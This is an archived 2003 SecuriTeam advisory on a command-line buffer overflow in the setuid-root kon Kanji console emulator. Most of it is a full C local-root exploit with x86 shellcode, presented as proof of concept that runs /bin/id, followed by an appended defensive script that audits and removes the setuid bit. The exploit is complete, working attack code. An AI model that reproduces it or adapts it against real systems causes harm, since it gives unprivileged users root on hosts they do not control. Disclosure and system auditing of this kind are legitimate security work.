[EXPL] Kon Exploit Code Released (Local)

From: SecuriTeam (support_at_securiteam.com)
Date: 06/16/03

    To: list@securiteam.com
    Date: 16 Jun 2003 19:57:13 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Latest attack techniques.

    You're a pen tester, but is google.com still your R&D team?
    Now you can get trustworthy commercial-grade exploits and the latest
    techniques from a world-class research group.

    Learn more at http://www.coresecurity.com/promos/sit_e1,
    or call 617-399-6980

    - - - - - - - - -

      Kon Exploit Code Released (Local)
    ------------------------------------------------------------------------

    SUMMARY

    KON is a Kanji emulator for the console. There is a buffer overflow
    vulnerability in the command line parsing code of the kon program, up to
    and including version 0.3.9b. Because kon is installed setuid root on the
    affected systems, a local user who exploits this overflow can gain
    elevated (root) privileges. The following exploit code can be used by
    administrators to test their systems for the vulnerability.

    DETAILS

    Exploit:
    /*
     * Buffer overflow in /usr/bin/kon v0.3.9b for RedHat 9.0
     *
     * The original bug was found by wszx for RedHat 8.0 - Ported to C
     *
     * Compile: gcc -Wall -o kon2root kon2root.c
     */

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    #define NOP 0x90
    #define RET 0xbffffffa
    #define VULN "/usr/bin/kon"
    #define MAXBUF 800

    /* Proof-of-concept payload (runs /bin/id). It is handed to kon as its
     * environment, so it sits near the top of the stack, close to RET. */
    static char w00tI4r3l33t[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/id";

    int main(void)
    {
        int i, *egg;
        long retaddr;
        /* MAXBUF bytes of return addresses plus the terminating NOP word
         * written after the loop. The original declared buff[MAXBUF], so
         * that final write landed one word past the end of the array. */
        static char buff[MAXBUF + sizeof(int)];
        static char *sploit[0x02] = { w00tI4r3l33t, NULL };

        fprintf(stdout, "\n\n\n[ PoC code for local root exploit in %s ]\n", VULN);
        fprintf(stdout, "[ Coded by c0ntex - http://62.31.72.168 ]\n");
        fprintf(stdout, "[ For Linux RedHat v9 x86 - Ret_Addr 0xbffffffa ]\n\n\n\n");

        /* Estimate where the environment string lands: RET minus the
         * lengths of the payload and the program name. */
        retaddr = RET - strlen(w00tI4r3l33t) - strlen(VULN);
        egg = (int *)buff;

        /* Fill the oversized argument with copies of the return address;
         * the trailing NOP word (0x90 0x00 0x00 0x00) also terminates
         * the string. */
        for (i = 0x00; i < MAXBUF; i += 0x04)
            *egg++ = retaddr;
        *egg = NOP;

        execle(VULN, VULN, "-Coding", buff, NULL, sploit);

        return 0x00;
    }
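    The privilege escalation described above depends on kon being installed setuid root. The following audit script is an added example and is not part of the advisory or of the kon project: it classifies a binary's mode and owner, reports whether the binary named in the advisory is setuid root, and can drop the bit as a mitigation. It assumes GNU coreutils stat(1) with the -c format option.

```sh
#!/bin/sh
# Added example, not code from the advisory: audit a binary for the
# setuid-root condition that turns a local overflow such as the kon one
# into a root escalation, and drop the bit as a mitigation.
# Assumes GNU coreutils stat(1) with the -c format option.

# classify_mode OCTAL_MODE OWNER_UID
# Prints setuid-root, setuid or not-setuid (pure: no filesystem access).
classify_mode() {
    mode="$1"; owner="$2"
    # A four-digit octal mode whose leading digit has the 4 bit set is setuid.
    case "$mode" in
        4???|5???|6???|7???)
            if [ "$owner" -eq 0 ]; then echo "setuid-root"; return 0; fi
            echo "setuid"; return 1 ;;
        *)  echo "not-setuid"; return 1 ;;
    esac
}

# setuid_status PATH
# Looks the file up with stat(1) and classifies it; "missing" if absent.
setuid_status() {
    path="$1"
    [ -e "$path" ] || { echo "missing"; return 2; }
    classify_mode "$(stat -c '%a' "$path")" "$(stat -c '%u' "$path")"
}

# drop_setuid_if_root PATH
# Removes the setuid bit only when the file is currently setuid root. kon
# then still runs for root, but an unprivileged user can no longer cross
# a privilege boundary through its argument parsing.
drop_setuid_if_root() {
    path="$1"
    if setuid_status "$path" >/dev/null; then
        chmod u-s "$path" && echo "removed setuid bit from $path"
    else
        echo "no change: $path is not setuid root"
    fi
}

# Audit run over the binary named in the advisory plus any extra paths.
if [ "${1:-}" = "--audit" ]; then
    shift
    for p in /usr/bin/kon "$@"; do
        printf '%s: %s\n' "$p" "$(setuid_status "$p")"
    done
fi
```

    Run it as `sh audit.sh --audit` to list the status of /usr/bin/kon, and call drop_setuid_if_root on a path only after confirming that unprivileged users do not need the binary.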

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:c0ntex@hushmail.com> c0ntex.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

